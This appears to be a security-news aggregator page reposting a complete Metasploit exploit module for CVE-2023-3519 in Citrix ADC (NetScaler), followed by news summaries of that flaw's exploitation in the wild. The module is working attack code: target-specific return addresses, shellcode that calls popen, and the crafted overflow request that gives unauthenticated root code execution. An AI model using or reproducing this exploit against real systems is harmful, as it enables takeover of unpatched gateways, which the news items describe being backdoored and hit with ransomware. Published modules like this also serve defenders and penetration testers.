Security
Headlines
HeadlinesLatestCVEs

Headline

Citrix ADC (NetScaler) Remote Code Execution

A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.

Packet Storm
#vulnerability#git#rce#buffer_overflow#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Citrix ADC (NetScaler) Forms SSO Target RCE',        'Description' => %q{          A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in          remote code execution as root.        },        'Author' => [          'Ron Bowes', # Analysis and module          'Douglass McKee', # Analysis and module          'Spencer McIntyre', # Just the module        ],        'References' => [          ['CVE', '2023-3519'],          ['URL', 'https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519'],          ['URL', 'https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467']        ],        'DisclosureDate' => '2023-07-18',        'License' => MSF_LICENSE,        'Platform' => ['unix'],        'Arch' => [ARCH_CMD],        'Payload' => {          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_rsp_adjustment']          'Space' => 2048,          'DisableNops' => true        },        'Targets' => [          [            'Citrix ADC 13.1-48.47',            {              'fixup_return' => 0x00782403, # pop rbx; ns_aaa_cookie_valid              'fixup_rsp_adjustment' => 0x13a8,              'popen' => 0x01da6340,              'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp              'return_offset' => 168            },          ],          [            'Citrix ADC 13.1-37.38',            {              'fixup_return' => 0x0077c324, # pop rbx; ns_aaa_cookie_valid              'fixup_rsp_adjustment' => 0x13a8,              'popen' => 0x01d7e320,              'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback              'return_offset' => 168            },          ],          [            'Citrix ADC 13.0-91.12',            {              'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid              'fixup_rsp_adjustment' => 0x12e0,              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit              # clobbers it, the value needs to be restored              'fixup_rbp_adjustment' => 0x190,              'popen' => 0x01f42ec0,              'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic              'return_offset' => 168            }          ]        ],        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'WfsDelay' => 10        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    res = send_request_cgi({      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')    })    return CheckCode::Unknown if res.nil?    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/    CheckCode::Detected  end  def exploit    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string      call loc_popen_arg1        ; add this to the path for python payloads        db "export PATH=/var/python/bin:$PATH;"        db "#{Rex::Text.to_hex(payload.encoded)}", 0      loc_popen_arg1:        pop  rdi      call loc_popen_arg2        db "r", 0      loc_popen_arg2:        pop rsi        mov  rax, <%= target['popen'] %>        sub  rsp, 0x200        call rax      loc_return:        xor rax, rax        add rsp, <%= target['fixup_rsp_adjustment'] + 0x200 %>        <% if target['fixup_rbp_adjustment'] %>        mov rbp, rsp        add rbp, <%= target['fixup_rbp_adjustment'] %>        <% end %>        push     <%= target['fixup_return'] %>        ret    SHELLCODE    buffer = rand_text_alphanumeric(target['return_offset'])    buffer << [target['return']].pack('Q')    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join    send_request_cgi({      'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),      'encode_params' => false,  # we'll encode them ourselves      'vars_get' => {        'event' => 'start',        'target' => buffer      }    })  end  class Template    def self.render(template, context = nil)      case context      when Hash        b = binding        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }        b.eval(locals.join)      when NilClass        b = binding      else        raise ArgumentError      end      b.eval(Erubi::Engine.new(template).src)    end  endend

Related news

U.S. Agencies Warn of Iranian Hacking Group's Ongoing Ransomware Attacks

U.S. cybersecurity and intelligence agencies have called out an Iranian hacking group for breaching multiple organizations across the country and coordinating with affiliates to deliver ransomware. The activity has been linked to a threat actor dubbed Pioneer Kitten, which is also known as Fox Kitten, Lemon Sandstorm (formerly Rubidium), Parisite, and UNC757, which it described as connected to

Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below - CVE-2023-6548 (CVSS score: 5.5) - Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management

Critical Citrix Bug Exploited as a Zero-Day, 'Patching Is Not Enough'

The latest threat to Citrix NetScaler, CVE-2023-4966, was exploited as a zero-day bug for months before a patch was issued. Researchers expect exploitation efforts to surge.

Citrix Devices Under Attack: NetScaler Flaw Exploited to Capture User Credentials

A recently disclosed critical flaw in Citrix NetScaler ADC and Gateway devices is being exploited by threat actors to conduct a credential harvesting campaign. IBM X-Force, which uncovered the activity last month, said adversaries exploited "CVE-2023-3519 to attack unpatched NetScaler Gateways to insert a malicious script into the HTML content of the authentication web page to capture user

Citrix NetScaler Alert: Ransomware Hackers Exploiting Critical Vulnerability

Unpatched Citrix NetScaler systems exposed to the internet are being targeted by unknown threat actors in what's suspected to be a ransomware attack. Cybersecurity company Sophos is tracking the activity cluster under the moniker STAC4663. Attack chains involve the exploitation of CVE-2023-3519, a critical code injection vulnerability impacting NetScaler ADC and Gateway servers that could

CISA Adds Citrix ShareFile Flaw to KEV Catalog Due to In-the-Wild Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Citrix ShareFile storage zones controller to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active in-the-wild exploitation. Tracked as CVE-2023-24489 (CVSS score: 9.8), the shortcoming has been described as an improper access control bug that, if successfully exploited

Citrix NetScalers backdoored in widespread exploitation campaign

Categories: Exploits and vulnerabilities Categories: News Tags: Citrix Tags: NetScalers Tags: Germany Tags: CVE-2023-3519 Tags: Fox-IT Tags: DIVD Researchers have found almost 2000 backdoored Citrix NetScalers, many of which were patched after the backdoor in the form of a web shell was dropped. (Read more...) The post Citrix NetScalers backdoored in widespread exploitation campaign appeared first on Malwarebytes Labs.

Nearly 2,000 Citrix NetScaler Instances Hacked via Critical Vulnerability

Nearly 2,000 Citrix NetScaler instances have been compromised with a backdoor by weaponizing a recently disclosed critical security vulnerability as part of a large-scale attack. "An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing web shells on vulnerable NetScalers to gain persistent access," NCC Group said in an advisory released Tuesday. "The adversary can

Hundreds of Citrix NetScaler ADC and Gateway Servers Hacked in Major Cyber Attack

Hundreds of Citrix NetScaler ADC and Gateway servers have been breached by malicious actors to deploy web shells, according to the Shadowserver Foundation. The non-profit said the attacks take advantage of CVE-2023-3519, a critical code injection vulnerability that could lead to unauthenticated remote code execution. The flaw, patched by Citrix last month, carries a CVSS score of 9.8. The

Apple iOS, Google Android Patch Zero-Days in July Security Updates

Plus: Mozilla fixes two high-severity bugs in Firefox, Citrix fixes a flaw that was used to attack a US-based critical infrastructure organization, and Oracle patches over 500 vulnerabilities.

CISA: You've got two weeks to patch Citrix NetScaler vulnerability CVE-2023-3519

Categories: Exploits and vulnerabilities Categories: News Tags: Citrix Tags: NetScaler Tags: CVE-2023-3519 Tags: web shell A critical unauthenticated remote code execution vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway is being actively exploited (Read more...) The post CISA: You've got two weeks to patch Citrix NetScaler vulnerability CVE-2023-3519 appeared first on Malwarebytes Labs.

Citrix NetScaler ADC and Gateway Devices Under Attack: CISA Urges Immediate Action

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory on Thursday warning that the newly disclosed critical security flaw in Citrix NetScaler Application Delivery Controller (ADC) and Gateway devices is being abused to drop web shells on vulnerable systems. "In June 2023, threat actors exploited this vulnerability as a zero-day to drop a web shell on a critical

Zero-Day Attacks Exploited Critical Vulnerability in Citrix ADC and Gateway

Citrix is alerting users of a critical security flaw in NetScaler Application Delivery Controller (ADC) and Gateway that it said is being actively exploited in the wild. Tracked as CVE-2023-3519 (CVSS score: 9.8), the issue relates to a case of code injection that could result in unauthenticated remote code execution. It impacts the following versions - NetScaler ADC and NetScaler Gateway 13.1

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution